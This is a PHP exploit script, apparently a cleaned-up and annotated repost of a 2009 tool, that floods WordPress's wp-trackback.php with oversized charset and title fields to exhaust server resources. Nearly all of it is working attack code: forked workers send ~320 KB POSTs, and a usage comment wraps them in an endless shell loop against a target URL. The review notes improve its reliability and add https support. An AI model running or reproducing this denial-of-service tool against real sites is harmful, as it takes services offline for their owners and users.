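<?php
/*
 * wordpress Resource exhaustion Exploit
 * http://rooibo.wordpress.com/
 * security@wordpress.org contacted and get a response,
 * but no solution available.
 *
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <panic@zerial.org>
 *
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
 *
 * ---- Review notes on the forum paste (2009 script, annotated) ----
 * This is a denial-of-service tool, not a scanner: each run forks WORKERS senders that
 * each POST a ~320 KB body (a 140 KB comma-separated "UTF-8,UTF-8,..." charset list plus a
 * 140 KB title) to wp-trackback.php, and the shell loop above repeats that indefinitely.
 * It has no throttle and no target check; run it only against a system you are explicitly
 * authorised to test. The underlying weakness is how wp-trackback.php of that era handled
 * the charset parameter (presumably an expensive character-set conversion over the
 * oversized list) — WordPress shipped a fix shortly afterwards, so confirm the target's
 * version before assuming it is affected.
 *
 * Corrections to the pasted code:
 *  - the truncated `utf8_encode($` expression is dropped: the paste lost its argument, and
 *    if it was the still-empty `$b` it added nothing; utf8_encode() is also deprecated in 8.2
 *  - `$path{0}` (curly-brace string offset, removed in PHP 8.0) replaced by construction
 *  - each child now exits after sending; previously it fell back into the fork loop, so
 *    every child forked its own children (up to 2^6 processes per run) and nobody waited
 *  - the parent reaps its children (the outer `while true` otherwise piles up zombies)
 *  - port and https are taken from the URL instead of a hard-coded plain-text port 80
 *  - a large fwrite() to a socket may be partial; the send loops until the body is out
 */

// Both the charset list and the title are padded to this many bytes (from the original).
const PAYLOAD_BYTES = 140000;

// Concurrent senders per run; the original loop ran $n = 0..5 inclusive.
const WORKERS = 6;

/**
 * Request path to wp-trackback.php under the WordPress base directory in the URL.
 *
 * @param array $target result of parse_url(); only 'path' is read, and it may be absent
 * @return string always starts with '/', never contains a doubled slash
 */
function trackback_path(array $target): string
{
    $base = trim($target['path'] ?? '', '/');
    $prefix = ($base === '') ? '' : $base . '/';
    return '/' . $prefix . 'wp-trackback.php';
}

/**
 * The x-www-form-urlencoded trackback body: an oversized charset list and an oversized
 * title, plus the minimal fields wp-trackback.php expects (url, blog_name, excerpt).
 *
 * http_build_query() applies the same RFC 1738 encoding urlencode() did for the charset;
 * the title is plain ASCII letters, so it is unchanged by encoding, as in the original.
 */
function trackback_body(): string
{
    return http_build_query([
        'charset'   => str_pad('', PAYLOAD_BYTES, 'UTF-8,'),
        'url'       => 'www.example.com',
        'title'     => str_pad('', PAYLOAD_BYTES, 'ABCEDFG'),
        'blog_name' => 'lol',
        'excerpt'   => 'lol',
    ]);
}

/**
 * Raw HTTP/1.1 POST for one trackback.
 *
 * @param string $hostHeader value for the Host header (host, or host:port if non-default)
 * @param string $path       request path, see trackback_path()
 * @param string $body       encoded form body, see trackback_body()
 * @return string complete request; the trailing CRLF pair after the body is kept from the
 *                original — it is beyond Content-length and harmless with Connection: close
 */
function trackback_request(string $hostHeader, string $path, string $body): string
{
    return "POST {$path} HTTP/1.1\r\n"
        . "Host: {$hostHeader}\r\n"
        . "Content-type: application/x-www-form-urlencoded\r\n"
        . 'Content-length: ' . strlen($body) . "\r\n"
        . "Connection: close\r\n\r\n"
        . $body . "\r\n\r\n";
}

/**
 * Open one connection, write the whole request, close. Returns true on success.
 *
 * The response is deliberately never read — the point is to hand the target the work, not
 * to wait for it — which matches the original. Failures are reported on STDERR.
 *
 * @param string $remote  transport-prefixed host, e.g. "tcp://example.org" or "ssl://..."
 * @param int    $port    TCP port
 * @param string $request bytes to send, see trackback_request()
 */
function send_request(string $remote, int $port, string $request): bool
{
    $errno = 0;
    $errstr = '';
    // Warning suppressed because $errstr is reported explicitly below.
    $fp = @fsockopen($remote, $port, $errno, $errstr, 10);
    if ($fp === false) {
        fwrite(STDERR, "unable to connect to: {$remote}:{$port} ({$errstr})\n");
        return false;
    }

    // fwrite() on a socket may write fewer bytes than asked; loop until done or stuck.
    $length = strlen($request);
    $written = 0;
    while ($written < $length) {
        $chunk = fwrite($fp, substr($request, $written));
        if ($chunk === false || $chunk === 0) {
            break;
        }
        $written += $chunk;
    }
    fclose($fp);

    if ($written !== $length) {
        fwrite(STDERR, "short write to {$remote}:{$port} ({$written}/{$length} bytes)\n");
        return false;
    }
    echo "hit!\n";
    return true;
}

/**
 * CLI entry point.
 *
 * @param array $argv command line; $argv[1] is the WordPress base URL (scheme required)
 * @return int process exit status: 0 when every sender succeeded, 1 on bad usage, missing
 *             pcntl, or any failed sender. The original exited 0 from every die().
 */
function main(array $argv): int
{
    if (count($argv) < 2) {
        fwrite(STDERR, "You need to specify a url to attack\n");
        return 1;
    }
    if (!function_exists('pcntl_fork')) {
        fwrite(STDERR, "This script needs the pcntl extension (php-cli built with pcntl)\n");
        return 1;
    }

    $target = parse_url($argv[1]);
    if ($target === false || !isset($target['host'])) {
        fwrite(STDERR, "The url should have http:// in front of it, and should be complete.\n");
        return 1;
    }

    $tls = strtolower($target['scheme'] ?? 'http') === 'https';
    $defaultPort = $tls ? 443 : 80;
    $port = $target['port'] ?? $defaultPort;
    $host = $target['host'];
    // Host header carries the port only when it is not the scheme default.
    $hostHeader = ($port === $defaultPort) ? $host : "{$host}:{$port}";
    $remote = ($tls ? 'ssl://' : 'tcp://') . $host;

    // Built once in the parent; each child inherits a copy.
    $request = trackback_request($hostHeader, trackback_path($target), trackback_body());

    $children = [];
    for ($n = 0; $n < WORKERS; $n++) {
        $pid = pcntl_fork();
        if ($pid === -1) {
            fwrite(STDERR, "fork failed after {$n} workers\n");
            break;
        }
        if ($pid === 0) {
            // Child: one connection, one request, then exit — never back into this loop.
            exit(send_request($remote, $port, $request) ? 0 : 1);
        }
        $children[] = $pid;
    }

    // Parent: reap every child so the outer shell loop does not accumulate zombies.
    $failed = 0;
    foreach ($children as $pid) {
        $status = 0;
        pcntl_waitpid($pid, $status);
        if (pcntl_wexitstatus($status) !== 0) {
            $failed++;
        }
    }
    return ($failed === 0) ? 0 : 1;
}

// Run only when invoked directly as a CLI script, so the helpers can be included elsewhere.
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    exit(main($argv));
}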